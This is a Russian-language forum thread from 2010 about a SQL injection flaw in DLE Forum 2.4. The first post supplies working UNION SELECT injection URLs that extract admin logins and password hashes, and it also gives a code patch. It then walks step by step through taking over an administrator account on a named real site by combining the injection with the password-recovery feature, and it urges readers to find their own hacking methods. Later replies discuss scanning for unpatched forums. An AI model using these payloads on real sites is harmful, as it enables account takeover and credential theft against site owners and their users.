Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
  • Страница 1 из 1
  • 1
SQL – инъекция в DLE-Forum 2.4
#1
Понедельник, 14.06.2010, 16:52
muztag
Заблокированные
Сообщения: 184
Репутация: 54
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:

ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_ group=1+limit+1-- ,

Если ВАш сайт уязвим, то в заголовке страницы будет отображен логин, и хеш пароля.
Уязвимость находится в скрипте engine/forum/sources/components/init.php в 446 строке!

if ($_REQUEST['category'])
{
$act = 'category';$cid =$_REQUEST['category'];

$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = $_REQUEST['showforum'];

$t_act = '?f'.$fid;
}

if ($_REQUEST['showtopic'])
{
$act = 'topic';

$tid = $_REQUEST['showtopic'];

$t_act = '?t'.$tid;
}

Данный код необходимо заменить на:
if ($_REQUEST['category'])
{
$act = 'category';
$cid = intval($_REQUEST['category']);
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = intval($_REQUEST['showforum']);
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = intval($_REQUEST['showtopic']);
$t_act = '?t'.$tid;
}

Добавлено (14.06.2010, 16:52)
---------------------------------------------
Как юзать грамотно сию багу
на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением
И так мы снегерировали хешь, осталось только достать его из базы
_http://8dle.ru/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS (0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16, 17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1-- (Пробелы надо стереть).
указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы <title>*** >> Darknull:md5
Копируем хешь и идем на ссылку
8dle.ru/?do=lostpassword&douser=ID&lostid=md5
вот и перед вами новый админский пароль
Если все сделано верно то вы гений
P.S. 8dle.ru уже залатали востановление пароля
так что ищите свои методы взлома

[color=red][size=22][b]Aviator и ПрифанТом дебили![/b][/size][/color]
#2
Понедельник, 14.06.2010, 17:20
HALLBOY222
Проверенный
Сообщения: 3456
Репутация: 5642
Quote (muztag)
http://8dle.ru/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS (0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16, 17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1--

Я так понял это название бд, как узнать можно название бд?
#3
Понедельник, 14.06.2010, 17:27
muztag
Заблокированные
Сообщения: 184
Репутация: 54
HALLBOY222 да.[quote=muztag]Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением[/quote]
[color=red][size=22][b]Aviator и ПрифанТом дебили![/b][/size][/color]
#4
Вторник, 15.06.2010, 09:26
dream5525
Проверенный
Сообщения: 347
Репутация: 636
Сейчас школьники пойдут ломать сайты...^^

Добавлено (15.06.2010, 09:26)
---------------------------------------------
HALLBOY222, это или dle или домен сайта как с 8dle

Пост отредактировал dream5525 - Вторник, 15.06.2010, 09:08
#5
Среда, 16.06.2010, 01:26
ClubNews
Проверенный
Сообщения: 4025
Репутация:
#6
Среда, 16.06.2010, 07:17
muztag
Заблокированные
Сообщения: 184
Репутация: 54
WooW Вот вот. Сейчас говорят еше есть 2-4 дырки в дле. КОторый целка оставила.Специально..
[color=red][size=22][b]Aviator и ПрифанТом дебили![/b][/size][/color]
#7
Среда, 16.06.2010, 07:46
dream5525
Проверенный
Сообщения: 347
Репутация: 636
muztag, дырки которые обнаружил Lion?
#8
Среда, 16.06.2010, 11:12
HALLBOY222
Проверенный
Сообщения: 3456
Репутация: 5642
dream5525, 8dle и взломали.
#9
Воскресенье, 01.08.2010, 11:40
A1exRus
Проверенный
Сообщения: 649
Репутация: 785
Багу скоро год исполнится)))
Понедельник, 23.08.2010, 17:30
AnabiOz
Проверенный
Сообщения: 426
Репутация: 411
если бы это было эфективно то все бы ломали сайты!
Всем пока , было с вами приятно пообщяться
Вторник, 24.08.2010, 12:36
A1exRus
Проверенный
Сообщения: 649
Репутация: 785
Quote (AnabiOz)
если бы это было эфективно то все бы ломали сайты!

AnabiOz, эффективно поверь, только уже вышли заплатки для дле форумов, и администраторы на порталах где они стоят уже обновили, только единицы с такими дырявыми форумами, сам недавно парсил и проверял <_<

Вторник, 05.10.2010, 15:28
Tihiy
Пользователь
Сообщения: 26
Репутация: 6
Пробую на своем форуме, пишет
[quote=Tihiy]Уважаемый посетитель! Согласно Вашему запросу для Вас был сгенерирован новый пароль. Данный пароль был отправлен вам на e-mail:такой-то. После авторизации на сайте вы сможете изменить данный пароль на любой другой.[/quote]
а так все хеши выводит. Я что-то не так делаю?
Мгновенная регистрация .ru доменов по 85/99 руб- ссылка в личке
Пятница, 08.10.2010, 15:24
A1exRus
Проверенный
Сообщения: 649
Репутация: 785
Quote (Tihiy)
Пробую на своем форуме, пишет
Quote (Tihiy)
Уважаемый посетитель! Согласно Вашему запросу для Вас был сгенерирован новый пароль. Данный пароль был отправлен вам на e-mail:такой-то. После авторизации на сайте вы сможете изменить данный пароль на любой другой.

а так все хеши выводит. Я что-то не так делаю?

у тебя версия движка видимо другая, надо именно 8,2
Среда, 19.01.2011, 23:40
Console
Проверенный
Сообщения: 182
Репутация: -17
Спасибо большое помогло!!
  • Страница 1 из 1
  • 1
Поиск:
Форум
Социальные сети
Хостинг от uCoz